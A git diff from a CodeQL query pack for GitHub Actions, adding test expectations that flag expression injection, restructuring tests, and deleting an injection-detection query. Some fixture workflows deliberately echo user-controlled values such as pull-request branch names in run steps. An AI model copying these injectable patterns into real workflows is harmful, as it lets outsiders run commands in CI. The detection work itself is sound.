id: step0 [value] | .github/workflows/test.yml:20:17:20:47 | ${{ ste ... 
value}} | -| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | -| .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | -| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | -| .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | -| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | -| composite-actions/action.yml:4:3:4:14 | input who-to-greet | composite-actions/action.yml:28:17:28:42 | ${{ inp ... reet }} | -| composite-actions/action.yml:4:3:4:14 | input who-to-greet | composite-actions/action.yml:35:12:35:51 | echo "H ... et }}." | -| composite-actions/action.yml:24:7:31:4 | name: Remove foo [value] | composite-actions/action.yml:32:12:32:50 | echo ${ ... alue }} | -| composite-actions/action.yml:28:17:28:42 | ${{ inp ... reet }} | composite-actions/action.yml:24:7:31:4 | name: Remove foo [value] | -nodes -| .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | semmle.label | name: R ... g chars [replaced] | -| .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | semmle.label | ${{gith ... title}} | -| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | semmle.label | ${{env.ISSUE_TITLE}} | -| .github/workflows/argus_case_study.yml:26:14:27:95 | \| | semmle.label | \| | -| .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output1] | semmle.label | uses: . ... low.yml [workflow-output1] | -| .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output2] | semmle.label | uses: . ... low.yml [workflow-output2] | -| .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... 
.ref }} | semmle.label | ${{ git ... .ref }} | -| .github/workflows/calling_workflow.yml:16:5:19:2 | uses: o ... .yml@v1 [workflow-output] | semmle.label | uses: o ... .yml@v1 [workflow-output] | -| .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | semmle.label | ${{ git ... .ref }} | -| .github/workflows/calling_workflow.yml:20:5:21:2 | uses: o ... .yml@v1 | semmle.label | uses: o ... .yml@v1 | -| .github/workflows/calling_workflow.yml:35:14:35:61 | echo ${ ... put1 }} | semmle.label | echo ${ ... put1 }} | -| .github/workflows/calling_workflow.yml:36:14:36:61 | echo ${ ... put2 }} | semmle.label | echo ${ ... put2 }} | -| .github/workflows/calling_workflow.yml:41:14:41:60 | echo ${ ... tput }} | semmle.label | echo ${ ... tput }} | -| .github/workflows/calling_workflow.yml:46:14:46:60 | echo ${ ... tput }} | semmle.label | echo ${ ... tput }} | -| .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | semmle.label | name: G ... d files | -| .github/workflows/changed-files.yml:21:14:24:15 | \| | semmle.label | \| | -| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | semmle.label | name: R ... g chars [replaced] | -| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | semmle.label | ${{gith ... ssage}} | -| .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | semmle.label | ${{step ... laced}} | -| .github/workflows/cross3.yml:41:12:43:5 | \| | semmle.label | \| | -| .github/workflows/cross3.yml:47:12:53:109 | \| | semmle.label | \| | -| .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | semmle.label | ${{step ... laced}} | -| .github/workflows/cross3.yml:61:21:68:47 | \| | semmle.label | \| | -| .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | semmle.label | name: E ... ial URL [initial_url] | -| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | semmle.label | ${{ git ... 
body }} | -| .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | semmle.label | name: G ... bugging [redirected_url] | -| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | semmle.label | name: T ... ter PNG [trimmed_url] | -| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:36:14:37:126 | \| | semmle.label | \| | -| .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | semmle.label | job_out ... alue }} [job_output] | -| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | -| .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | semmle.label | name: G ... d files | -| .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | semmle.label | name: R ... d files [value] | -| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | -| .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | semmle.label | matrix: ... iles }} [matrix] | -| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | semmle.label | name: G ... d files | -| .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | semmle.label | ${{ fro ... 
rix) }} | -| .github/workflows/matrix.yml:41:12:42:31 | \| | semmle.label | \| | -| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | semmle.label | input config-path | -| .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output1] | semmle.label | output workflow-output1: [workflow-output1] | -| .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output2] | semmle.label | output workflow-output1: [workflow-output2] | -| .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | semmle.label | ${{ job ... put1 }} | -| .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | semmle.label | ${{ job ... put2 }} | -| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | semmle.label | job-out ... utput}} [job-output1] | -| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output2] | semmle.label | job-out ... utput}} [job-output2] | -| .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | semmle.label | ${{ ste ... utput}} | -| .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | semmle.label | ${{ ste ... files}} | -| .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | semmle.label | id: step1 [step-output] | -| .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | semmle.label | ${{ inp ... path }} | -| .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | semmle.label | \| | -| .github/workflows/reusable_workflow.yml:31:9:33:43 | name: G ... d files | semmle.label | name: G ... d files | -| .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | semmle.label | id: summary [value] | -| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | semmle.label | ${{ git ... 
sage }} | -| .github/workflows/simple1.yml:15:14:16:50 | \| | semmle.label | \| | -| .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | semmle.label | name: G ... d files | -| .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | semmle.label | name: R ... d files [value] | -| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/simple2.yml:28:14:31:15 | \| | semmle.label | \| | -| .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | semmle.label | job_out ... test }} [job_output] | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | semmle.label | ${{ ste ... test }} | -| .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | semmle.label | id: step0 [value] | -| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | semmle.label | ${{ git ... sage }} | -| .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | semmle.label | id: step1 [MSG] | -| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | semmle.label | ${{ ste ... value}} | -| .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | semmle.label | id: step2 [test] | -| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | semmle.label | ${{step ... s.MSG}} | -| .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | -| composite-actions/action.yml:4:3:4:14 | input who-to-greet | semmle.label | input who-to-greet | -| composite-actions/action.yml:24:7:31:4 | name: Remove foo [value] | semmle.label | name: Remove foo [value] | -| composite-actions/action.yml:28:17:28:42 | ${{ inp ... reet }} | semmle.label | ${{ inp ... reet }} | -| composite-actions/action.yml:32:12:32:50 | echo ${ ... alue }} | semmle.label | echo ${ ... alue }} | -| composite-actions/action.yml:35:12:35:51 | echo "H ... et }}." | semmle.label | echo "H ... et }}." 
| -subpaths -| .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output1] | .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output1] | -#select -| .github/workflows/argus_case_study.yml:26:14:27:95 | \| | .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | Potential injection from the ${{ steps.remove_quotations.outputs.replaced }}, which may be controlled by an external user. | -| .github/workflows/calling_workflow.yml:35:14:35:61 | echo ${ ... put1 }} | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:35:14:35:61 | echo ${ ... put1 }} | Potential injection from the ${{ needs.call2.outputs.workflow-output1 }}, which may be controlled by an external user. | -| .github/workflows/calling_workflow.yml:36:14:36:61 | echo ${ ... put2 }} | .github/workflows/reusable_workflow.yml:31:9:33:43 | name: G ... d files | .github/workflows/calling_workflow.yml:36:14:36:61 | echo ${ ... put2 }} | Potential injection from the ${{ needs.call2.outputs.workflow-output2 }}, which may be controlled by an external user. | -| .github/workflows/calling_workflow.yml:41:14:41:60 | echo ${ ... tput }} | .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:41:14:41:60 | echo ${ ... tput }} | Potential injection from the ${{ needs.call3.outputs.workflow-output }}, which may be controlled by an external user. | -| .github/workflows/calling_workflow.yml:46:14:46:60 | echo ${ ... tput }} | .github/workflows/calling_workflow.yml:20:5:21:2 | uses: o ... .yml@v1 | .github/workflows/calling_workflow.yml:46:14:46:60 | echo ${ ... 
tput }} | Potential injection from the ${{ needs.call4.outputs.workflow-output }}, which may be controlled by an external user. | -| .github/workflows/changed-files.yml:21:14:24:15 | \| | .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | .github/workflows/changed-files.yml:21:14:24:15 | \| | Potential injection from the ${{ steps.changed-files.outputs.all_changed_files }}, which may be controlled by an external user. | -| .github/workflows/cross3.yml:41:12:43:5 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:41:12:43:5 | \| | Potential injection from the ${{ env.ISSUE_BODY_PARSED }}, which may be controlled by an external user. | -| .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential injection from the ${{ env.auto_branch }}, which may be controlled by an external user. | -| .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential injection from the ${{ env.destination_branch }}, which may be controlled by an external user. | -| .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential injection from the ${{ env.pr_message }}, which may be controlled by an external user. | -| .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential injection from the ${{ env.user_name }}, which may be controlled by an external user. | -| .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... 
ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential injection from the ${{ github.event.after }}, which may be controlled by an external user. | -| .github/workflows/image_link_generator.yml:36:14:37:126 | \| | .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | Potential injection from the ${{ steps.trim-url.outputs.trimmed_url }}, which may be controlled by an external user. | -| .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | Potential injection from the ${{ needs.job1.outputs.job_output }}, which may be controlled by an external user. | -| .github/workflows/matrix.yml:41:12:42:31 | \| | .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | .github/workflows/matrix.yml:41:12:42:31 | \| | Potential injection from the ${{ matrix.language }}, which may be controlled by an external user. | -| .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | Potential injection from the ${{ inputs.config-path }}, which may be controlled by an external user. | -| .github/workflows/simple1.yml:15:14:16:50 | \| | .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:15:14:16:50 | \| | Potential injection from the ${{ steps.summary.outputs.value }}, which may be controlled by an external user. | -| .github/workflows/simple2.yml:28:14:31:15 | \| | .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | .github/workflows/simple2.yml:28:14:31:15 | \| | Potential injection from the ${{ steps.step.outputs.value }}, which may be controlled by an external user. | -| .github/workflows/test.yml:37:14:37:52 | echo ${ ... 
utput}} | .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | Potential injection from the ${{ needs.job1.outputs.job_output }}, which may be controlled by an external user. | -| composite-actions/action.yml:32:12:32:50 | echo ${ ... alue }} | composite-actions/action.yml:4:3:4:14 | input who-to-greet | composite-actions/action.yml:32:12:32:50 | echo ${ ... alue }} | Potential injection from the ${{ steps.replace.outputs.value }}, which may be controlled by an external user. | -| composite-actions/action.yml:35:12:35:51 | echo "H ... et }}." | composite-actions/action.yml:4:3:4:14 | input who-to-greet | composite-actions/action.yml:35:12:35:51 | echo "H ... et }}." | Potential injection from the ${{ inputs.who-to-greet }}, which may be controlled by an external user. | diff --git a/ql/src/test/test.ql b/ql/src/test/test.ql deleted file mode 100644 index f8d6e0c804b..00000000000 --- a/ql/src/test/test.ql +++ /dev/null 
@@ -1,37 +0,0 @@
-/**
- * @name Expression injection in Actions
- * @description Using user-controlled GitHub Actions contexts like `run:` or `script:` may allow a malicious
- * user to inject code into the GitHub action.
- * @kind path-problem
- * @problem.severity warning
- * @security-severity 9.3
- * @precision high
- * @id actions/command-injection
- * @tags actions
- * security
- * external/cwe/cwe-094
- */
-
-import actions
-import codeql.actions.TaintTracking
-import codeql.actions.dataflow.FlowSources
-
-private class ExpressionInjectionSink extends DataFlow::Node {
- ExpressionInjectionSink() { exists(RunExpr e | e.getScriptExpr() = this.asExpr()) }
-}
-
-private module MyConfig implements DataFlow::ConfigSig {
- predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource }
-
- predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink }
-}
-
-module MyFlow = TaintTracking::Global;
-
-import MyFlow::PathGraph
-
-from MyFlow::PathNode source, MyFlow::PathNode sink
-where MyFlow::flowPath(source, sink)
-select sink.getNode(), source, sink,
- "Potential injection from the ${{ " + sink.getNode().asExpr().(ExprAccessExpr).getExpression() +
- " }}, which may be controlled by an external user."
diff --git a/ql/test/codeql-pack.lock.yml b/ql/test/codeql-pack.lock.yml
new file mode 100644
index 00000000000..8494dea432f
--- /dev/null
+++ b/ql/test/codeql-pack.lock.yml
@@ -0,0 +1,16 @@
+---
+lockVersion: 1.0.0
+dependencies:
+ codeql/controlflow:
+ version: 0.1.8
+ codeql/dataflow:
+ version: 0.1.8
+ codeql/ssa:
+ version: 0.2.8
+ codeql/typetracking:
+ version: 0.2.8
+ codeql/util:
+ version: 0.2.8
+ codeql/yaml:
+ version: 0.2.9
+compiled: false
diff --git a/ql/lib/test/.github/workflows/test.yml b/ql/test/library-tests/.github/workflows/test.yml
similarity index 100%
rename from ql/lib/test/.github/workflows/test.yml
rename to ql/test/library-tests/.github/workflows/test.yml
diff --git a/ql/lib/test/test.expected b/ql/test/library-tests/test.expected
similarity index 100%
rename from ql/lib/test/test.expected
rename to ql/test/library-tests/test.expected
diff --git a/ql/lib/test/test.ql b/ql/test/library-tests/test.ql
similarity index 100%
rename from ql/lib/test/test.ql
rename to ql/test/library-tests/test.ql
diff --git a/ql/test/qlpack.yml b/ql/test/qlpack.yml
new file mode 100644
index 00000000000..d85fc698394
--- /dev/null
+++ b/ql/test/qlpack.yml
@@ -0,0 +1,12 @@
+---
+name: githubsecuritylab/actions-tests
+groups:
+ - actions
+ - test
+dependencies:
+ githubsecuritylab/actions-all: ${workspace}
+ githubsecuritylab/actions-queries: ${workspace}
+extractor: yaml
+tests: .
+warnOnImplicitThis: true
+
diff --git a/ql/src/test/.github/workflows/calling_composite.yml b/ql/test/query-tests/Security/CWE-020/.github/workflows/calling_composite.yml
similarity index 99%
rename from ql/src/test/.github/workflows/calling_composite.yml
rename to ql/test/query-tests/Security/CWE-020/.github/workflows/calling_composite.yml
index 79c2d072ef5..cc3f3c2863c 100644
--- a/ql/src/test/.github/workflows/calling_composite.yml
+++ b/ql/test/query-tests/Security/CWE-020/.github/workflows/calling_composite.yml
@@ -12,3 +12,4 @@ jobs:
 who-to-greet: ${{ github.event.pull_request.head.ref }}
 - run: echo ${{ steps.foo.outputs.reflected}}
 - run: echo ${{ steps.foo.outputs.tainted}}
+
diff --git a/ql/src/test/.github/workflows/calling_workflow.yml b/ql/test/query-tests/Security/CWE-020/.github/workflows/calling_workflow.yml
similarity index 99%
rename from ql/src/test/.github/workflows/calling_workflow.yml
rename to ql/test/query-tests/Security/CWE-020/.github/workflows/calling_workflow.yml
index 7c2bfdf0348..239ea7ab387 100644
--- a/ql/src/test/.github/workflows/calling_workflow.yml
+++ b/ql/test/query-tests/Security/CWE-020/.github/workflows/calling_workflow.yml
@@ -44,3 +44,4 @@ jobs:
 needs: call4
 steps:
 - run: echo ${{ needs.call4.outputs.workflow-output }}
+
diff --git a/ql/src/test/.github/workflows/reusable_workflow.yml b/ql/test/query-tests/Security/CWE-020/.github/workflows/reusable_workflow.yml
similarity index 99%
rename from ql/src/test/.github/workflows/reusable_workflow.yml
rename to ql/test/query-tests/Security/CWE-020/.github/workflows/reusable_workflow.yml
index 45c177edecb..0ca7ecdfbde 100644
--- a/ql/src/test/.github/workflows/reusable_workflow.yml
+++ b/ql/test/query-tests/Security/CWE-020/.github/workflows/reusable_workflow.yml
@@ -31,3 +31,4 @@ jobs:
 - name: Get changed files
 id: step2
 uses: tj-actions/changed-files@v40
+
diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected
new file mode 100644
index 00000000000..d31268b12b5
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected
@@ -0,0 +1,15 @@
+edges
+| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:28:17:28:42 | ${{ inp ... reet }} |
+| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:12:35:51 | echo "H ... et }}." |
+| action1/action.yml:24:7:31:4 | name: Remove foo [value] | action1/action.yml:32:12:32:50 | echo ${ ... alue }} |
+| action1/action.yml:28:17:28:42 | ${{ inp ... reet }} | action1/action.yml:24:7:31:4 | name: Remove foo [value] |
+nodes
+| action1/action.yml:4:3:4:14 | input who-to-greet | semmle.label | input who-to-greet |
+| action1/action.yml:24:7:31:4 | name: Remove foo [value] | semmle.label | name: Remove foo [value] |
+| action1/action.yml:28:17:28:42 | ${{ inp ... reet }} | semmle.label | ${{ inp ... reet }} |
+| action1/action.yml:32:12:32:50 | echo ${ ... alue }} | semmle.label | echo ${ ... alue }} |
+| action1/action.yml:35:12:35:51 | echo "H ... et }}." | semmle.label | echo "H ... et }}." |
+subpaths
+#select
+| action1/action.yml:32:12:32:50 | echo ${ ... alue }} | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:32:12:32:50 | echo ${ ... alue }} | Sink |
+| action1/action.yml:35:12:35:51 | echo "H ... et }}." | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:12:35:51 | echo "H ... et }}." | Sink |
diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.qlref b/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.qlref
new file mode 100644
index 00000000000..f8e1bfca630
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.qlref
@@ -0,0 +1 @@
+Security/CWE-020/CompositeActionsSinks.ql
diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected
new file mode 100644
index 00000000000..23369932e81
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected
@@ -0,0 +1,12 @@
+edges
+| action1/action.yml:42:7:44:4 | id: changed-files | action1/action.yml:48:18:48:69 | ${{ ste ... iles }} |
+| action1/action.yml:44:7:48:70 | id: source [tainted] | action1/action.yml:14:12:14:45 | ${{ ste ... inted}} |
+| action1/action.yml:48:18:48:69 | ${{ ste ... iles }} | action1/action.yml:44:7:48:70 | id: source [tainted] |
+nodes
+| action1/action.yml:14:12:14:45 | ${{ ste ... inted}} | semmle.label | ${{ ste ... inted}} |
+| action1/action.yml:42:7:44:4 | id: changed-files | semmle.label | id: changed-files |
+| action1/action.yml:44:7:48:70 | id: source [tainted] | semmle.label | id: source [tainted] |
+| action1/action.yml:48:18:48:69 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} |
+subpaths
+#select
+| action1/action.yml:14:12:14:45 | ${{ ste ... inted}} | action1/action.yml:42:7:44:4 | id: changed-files | action1/action.yml:14:12:14:45 | ${{ ste ... inted}} | Source |
diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.qlref b/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.qlref
new file mode 100644
index 00000000000..dce31c31923
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.qlref
@@ -0,0 +1,2 @@
+Security/CWE-020/CompositeActionsSources.ql
+
diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected
new file mode 100644
index 00000000000..8ec7f44dba3
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected
@@ -0,0 +1,12 @@
+edges
+| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:41:29:41:54 | ${{ inp ... reet }} |
+| action1/action.yml:37:7:42:4 | id: reflector [reflected] | action1/action.yml:11:12:11:51 | ${{ ste ... cted }} |
+| action1/action.yml:41:29:41:54 | ${{ inp ... reet }} | action1/action.yml:37:7:42:4 | id: reflector [reflected] |
+nodes
+| action1/action.yml:4:3:4:14 | input who-to-greet | semmle.label | input who-to-greet |
+| action1/action.yml:11:12:11:51 | ${{ ste ... cted }} | semmle.label | ${{ ste ... cted }} |
+| action1/action.yml:37:7:42:4 | id: reflector [reflected] | semmle.label | id: reflector [reflected] |
+| action1/action.yml:41:29:41:54 | ${{ inp ... reet }} | semmle.label | ${{ inp ... reet }} |
+subpaths
+#select
+| action1/action.yml:11:12:11:51 | ${{ ste ... cted }} | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:11:12:11:51 | ${{ ste ... cted }} | Summary |
diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.qlref b/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.qlref
new file mode 100644
index 00000000000..007941cd2f5
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.qlref
@@ -0,0 +1,2 @@
+Security/CWE-020/CompositeActionsSummaries.ql
+
diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected
new file mode 100644
index 00000000000..c9e26d368df
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected
@@ -0,0 +1,8 @@
+edges
+| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| |
+nodes
+| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | semmle.label | input config-path |
+| .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | semmle.label | \| |
+subpaths
+#select
+| .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | Sink |
diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.qlref b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.qlref
new file mode 100644
index 00000000000..369befbce62
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.qlref
@@ -0,0 +1,2 @@
+Security/CWE-020/ReusableWorkflowsSinks.ql
+
diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected
new file mode 100644
index 00000000000..8e19cd469ab
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected
@@ -0,0 +1,12 @@
+edges
+| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output2] | .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} |
+| .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output2] |
+| .github/workflows/reusable_workflow.yml:31:9:33:43 | name: G ... d files | .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} |
+nodes
+| .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | semmle.label | ${{ job ... put2 }} |
+| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output2] | semmle.label | job-out ... utput}} [job-output2] |
+| .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | semmle.label | ${{ ste ... files}} |
+| .github/workflows/reusable_workflow.yml:31:9:33:43 | name: G ... d files | semmle.label | name: G ... d files |
+subpaths
+#select
+| .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | .github/workflows/reusable_workflow.yml:31:9:33:43 | name: G ... d files | .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | Source |
diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.qlref b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.qlref
new file mode 100644
index 00000000000..cbea721ee34
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.qlref
@@ -0,0 +1,2 @@
+Security/CWE-020/ReusableWorkflowsSources.ql
+
diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected
new file mode 100644
index 00000000000..f7d715c9fa1
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected
@@ -0,0 +1,16 @@
+edges
+| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} |
+| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} |
+| .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] |
+| .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} |
+| .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] |
+nodes
